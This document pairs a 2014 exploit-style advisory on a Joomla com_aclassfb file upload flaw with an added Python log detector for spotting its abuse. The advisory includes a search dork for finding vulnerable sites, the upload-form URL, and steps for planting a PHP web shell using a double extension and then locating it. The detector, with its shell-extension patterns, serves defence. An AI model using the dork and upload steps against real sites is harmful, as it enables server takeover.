The Joomla Aclassfb component suffers from a remote shell upload vulnerability.
9d0fb8ff59906454f8f77b6cd1a8d6cbd5c42f068d8b4fc058718a4e32f3316f
#Title : Joomla com_aclassfb File Upload Vulnerability
#Author : DevilScreaM
#Date : 10 January 2014
#Category : Web Applications
#Vendor : http://www.almondsoft.com
#Type : PHP
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security | Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Tested : Mozilla, Chrome, Opera -> Windows & Linux
#Vulnerability : File Upload
#Dork : inurl:com_aclassfb
File Upload
http://127.0.0.1/index.php?option=com_aclassfb
Exploit :
http://127.0.0.1/index.php?option=com_aclassfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form
POC :
1. Select Category
2. After Select Category, Click Post New Ad
http://127.0.0.1/index.php?option=com_aclassfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form
3. Upload Your Shell
extension : .php .php.jpg / etc
Shell Access :
http://127.0.0.1/component/com_aclassfb/photos/
Find Your Shell
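For site operators, the useful takeaway from this advisory is the pair of signals it describes: a client hitting the component's add_form route, then requesting a script-like file name (such as a ".php" or ".php.jpg" double extension) under /component/com_aclassfb/photos/. The following detector is an added example written for this page; it is not code from the advisory, its author, or the vendor. It assumes Apache combined-format access logs and uses constructed sample lines; the URL paths are the ones the advisory itself lists.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (Apache combined format), for illustration only.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2014:10:01:02 +0000] "GET /index.php?option=com_aclassfb&Itemid=12&ct=4&md=add_form HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jan/2014:10:01:30 +0000] "POST /index.php?option=com_aclassfb&Itemid=12&ct=4&md=add_form HTTP/1.1" 303 0 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jan/2014:10:01:45 +0000] "GET /component/com_aclassfb/photos/c99.php.jpg HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jan/2014:10:05:00 +0000] "GET /component/com_aclassfb/photos/sofa.jpg HTTP/1.1" 200 40233 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jan/2014:10:05:10 +0000] "GET /index.php?option=com_aclassfb&Itemid=12&ct=4 HTTP/1.1" 200 7000 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Upload directory named in the advisory (assumed to be served directly by the web server).
PHOTOS_DIR = "/component/com_aclassfb/photos/"

# Script-like extensions, matched anywhere in the file name so that double
# extensions such as "shell.php.jpg" are caught as well as plain "shell.php".
EXEC_EXT_RE = re.compile(r'\.(php\d?|phtml|phar)(\.|$)', re.IGNORECASE)


def parse_line(line):
    """Parse one access-log line into a dict; return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    u = urlparse(rec["path"])
    rec["route"] = u.path
    rec["query"] = {k: v[0] for k, v in parse_qs(u.query).items()}
    return rec


def is_upload_form(rec):
    """True for requests to the component's 'add_form' route (the upload form)."""
    q = rec["query"]
    return q.get("option") == "com_aclassfb" and q.get("md") == "add_form"


def is_suspicious_photo(rec):
    """True for a request under the photos directory whose name looks executable."""
    route = rec["route"]
    if not route.startswith(PHOTOS_DIR):
        return False
    name = route[len(PHOTOS_DIR):]
    return bool(EXEC_EXT_RE.search(name))


def find_upload_abuse(log_text):
    """Return (client, route) pairs for clients that visited the add_form route
    and later fetched a script-like file from the component's photos directory."""
    clients_seen_form = set()
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if is_upload_form(rec):
            clients_seen_form.add(rec["ip"])
        elif is_suspicious_photo(rec) and rec["ip"] in clients_seen_form:
            hits.append((rec["ip"], rec["route"]))
    return hits


if __name__ == "__main__":
    for ip, route in find_upload_abuse(SAMPLE_LOG):
        print(f"suspicious upload access from {ip}: {route}")
```

The sequence check (form visit first, script-like fetch second, same client) keeps ordinary image views of the photos directory out of the alert; a lone hit on a ".php" name under that directory is still worth a separate, lower-confidence rule, since the first request may predate the log window.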